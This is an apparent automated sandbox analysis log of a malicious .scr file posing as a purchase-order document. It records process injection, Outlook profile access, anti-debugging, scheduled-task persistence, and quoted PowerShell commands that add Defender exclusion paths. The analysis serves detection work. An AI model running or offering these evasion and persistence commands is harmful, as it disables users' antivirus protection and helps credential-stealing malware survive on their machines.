                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Automated click: OK
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Automated click: OK
                Source: C:\Windows\SysWOW64\msinfo32.exe File opened: C:\Windows\SysWOW64\RichEd32.dll
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\msinfo32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: RFQ_P.O.1212024.scr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: RFQ_P.O.1212024.scr Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: msinfo32.pdb source: mrNbohrgjTw.exe, 0000000B.00000003.383034129.0000000000504000.00000004.00000001.00020000.00000000.sdmp, mrNbohrgjTw.exe, 0000000B.00000002.873630788.000000000052B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: msinfo32.pdb@ source: mrNbohrgjTw.exe, 0000000B.00000003.383034129.0000000000504000.00000004.00000001.00020000.00000000.sdmp, mrNbohrgjTw.exe, 0000000B.00000002.873630788.000000000052B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mrNbohrgjTw.exe, 0000000B.00000000.379719754.0000000000CEE000.00000002.00000001.01000000.0000000A.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873854822.0000000000CEE000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: RegSvcs.pdb, source: msinfo32.exe, 0000000C.00000002.873979376.00000000028BC000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873553497.0000000000676000.00000004.00000020.00020000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000000.409282745.0000000002D1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.461474996.000000000170C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873778069.0000000002010000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000003.396847773.0000000001E80000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000003.396514209.0000000001D20000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873778069.0000000002190000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.415871928.000000000094C000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: msinfo32.exe, 0000000C.00000002.873979376.00000000028BC000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873553497.0000000000676000.00000004.00000020.00020000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000000.409282745.0000000002D1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.461474996.000000000170C000.00000004.80000000.00040000.00000000.sdmp

                Data Obfuscation

                Source: RFQ_P.O.1212024.scr, ServerForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: PEJmengI.exe.0.dr, ServerForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, ElmNrXtZw4MREHe3PO.cs.Net Code: uQ5bowdOos System.Reflection.Assembly.Load(byte[])
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, ElmNrXtZw4MREHe3PO.cs.Net Code: uQ5bowdOos System.Reflection.Assembly.Load(byte[])
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, ElmNrXtZw4MREHe3PO.cs.Net Code: uQ5bowdOos System.Reflection.Assembly.Load(byte[])
                Source: sqlite3.dll.12.drStatic PE information: section name: /4
                Source: sqlite3.dll.12.drStatic PE information: section name: /19
                Source: sqlite3.dll.12.drStatic PE information: section name: /31
                Source: sqlite3.dll.12.drStatic PE information: section name: /45
                Source: sqlite3.dll.12.drStatic PE information: section name: /57
                Source: sqlite3.dll.12.drStatic PE information: section name: /70
                Source: sqlite3.dll.12.drStatic PE information: section name: /81
                Source: sqlite3.dll.12.drStatic PE information: section name: /92
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrCode function: 0_2_001B31FD push esp; ret 0_2_001B3201
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040205D push esp; retf 8_2_0040206B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00418830 push esi; ret 8_2_00418831
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004018CB pushad ; iretd 8_2_004018CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004148F3 push edx; retf 8_2_0041499F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040214A pushad ; ret 8_2_0040214E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00401971 push ecx; ret 8_2_00401972
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041498F push edx; retf 8_2_0041499F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004149A0 push edx; retf 8_2_0041499F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0040D253 push cs; retf 8_2_0040D284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00403290 push eax; ret 8_2_00403292
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_004182BA pushfd ; retf 8_2_004182CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_004073BB pushfd ; iretd 8_2_004073BD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00408524 push 098F1E49h; ret 8_2_00408529
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00401D82 push ecx; ret 8_2_00401D83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00401DA0 push ebp; iretd 8_2_00401DB4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00411DA3 push FFFFFFFFh; ret 8_2_00411DA7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0040164A push ecx; ret 8_2_0040164B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0041464D push esi; retf 8_2_0041464E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_004016C8 push ecx; ret 8_2_004016C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00418F4D push edi; ret 8_2_00418F5C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00418F53 push edi; ret 8_2_00418F5C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0041872A push cs; ret 8_2_0041872C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00418F98 push A1C798CCh; ret 8_2_00418F9E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0096DFA1 push ecx; ret 8_2_0096DFB4
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Code function: 10_2_001D31F5 push esp; ret 10_2_001D31F9
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Code function: 10_2_001D9210 push esp; iretd 10_2_001D9211
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Code function: 10_2_001D922A push esp; iretd 10_2_001D922B
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Code function: 10_2_001D93B4 push ebx; iretd 10_2_001D93B5
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe Code function: 11_2_040B6438 push D687906Bh; ret 11_2_040B645D
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe Code function: 11_2_040AD4CD push cs; retf 11_2_040AD4FE
                Source: RFQ_P.O.1212024.scr Static PE information: section name: .text entropy: 7.712122709503229
                Source: PEJmengI.exe.0.dr Static PE information: section name: .text entropy: 7.712122709503229
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack High entropy of concatenated method names
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack High entropy of concatenated method names
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack High entropy of concatenated method names
                Source: C:\Windows\SysWOW64\msinfo32.exe File created: C:\Users\user\AppData\Local\Temp\sqlite3.dll
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr File created: C:\Users\user\AppData\Roaming\PEJmengI.exe

                Boot Survival

                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp"
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msinfo32.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msinfo32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 1B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 410000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 7DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 58E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 8DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 5BD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: 9ED0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: AED0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrMemory allocated: BED0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 2630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 4E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 5B60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 58D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 6B60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 7B60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 7EF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 8EF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMemory allocated: 9EF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009B0101 rdtsc 8_2_009B0101
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2046Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2096Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3073Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1824Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeWindow / User API: threadDelayed 2882Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeWindow / User API: threadDelayed 7078Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1434
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1598
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1101
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1217
                Source: C:\Windows\SysWOW64\msinfo32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
                Source: C:\Windows\SysWOW64\msinfo32.exeAPI coverage: 1.9 %
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr TID: 3532Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr TID: 3248Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3424Thread sleep count: 2046 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3428Thread sleep count: 2096 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3588Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3388Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3592Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3472Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\taskeng.exe TID: 3652Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe TID: 3952Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe TID: 3688Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 4000Thread sleep count: 2882 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 4000Thread sleep time: -5764000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 3044Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 4000Thread sleep count: 7078 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 4000Thread sleep time: -14156000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3956Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3980Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4016Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4024Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe TID: 4080Thread sleep time: -70000s >= -30000s
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe TID: 4080Thread sleep count: 31 > 30
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe TID: 4080Thread sleep time: -46500s >= -30000s
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe TID: 4080Thread sleep count: 36 > 30
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe TID: 4080Thread sleep time: -36000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msinfo32.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msinfo32.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
                Source: C:\Windows\SysWOW64\msinfo32.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
                Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 12_2_61E19146 sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,12_2_61E19146
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\msinfo32.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_009B0101 rdtsc 8_2_009B0101
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_009607AC NtCreateMutant,LdrInitializeThunk,8_2_009607AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00950080 mov ecx, dword ptr fs:[00000030h] 8_2_00950080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_009500EA mov eax, dword ptr fs:[00000030h] 8_2_009500EA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_009726F8 mov eax, dword ptr fs:[00000030h] 8_2_009726F8
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr"
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtQueryInformationProcess: Direct from: 0x774CFAFA
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtCreateUserProcess: Direct from: 0x774D093E
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtCreateKey: Direct from: 0x774CFB62
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtQuerySystemInformation: Direct from: 0x774D20DE
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtQueryDirectoryFile: Direct from: 0x774CFDBA
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtClose: Direct from: 0x774CFA02
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtWriteVirtualMemory: Direct from: 0x774D213E
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtCreateFile: Direct from: 0x774D00D6
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtSetTimer: Direct from: 0x774D021A
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtOpenFile: Direct from: 0x774CFD86
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtSetInformationThread: Direct from: 0x774E9893
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtOpenKeyEx: Direct from: 0x774CFA4A
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtAllocateVirtualMemory: Direct from: 0x774CFAE2
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtResumeThread: Direct from: 0x774D008D
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtOpenKeyEx: Direct from: 0x774D103A
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtUnmapViewOfSection: Direct from: 0x774CFCA2
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtDelayExecution: Direct from: 0x774CFDA1
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtSetInformationProcess: Direct from: 0x774CFB4A
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtSetInformationThread: Direct from: 0x774CF9CE
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtReadFile: Direct from: 0x774CF915
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtMapViewOfSection: Direct from: 0x774CFC72
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtCreateThreadEx: Direct from: 0x774D08C6
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtDeviceIoControlFile: Direct from: 0x774CF931
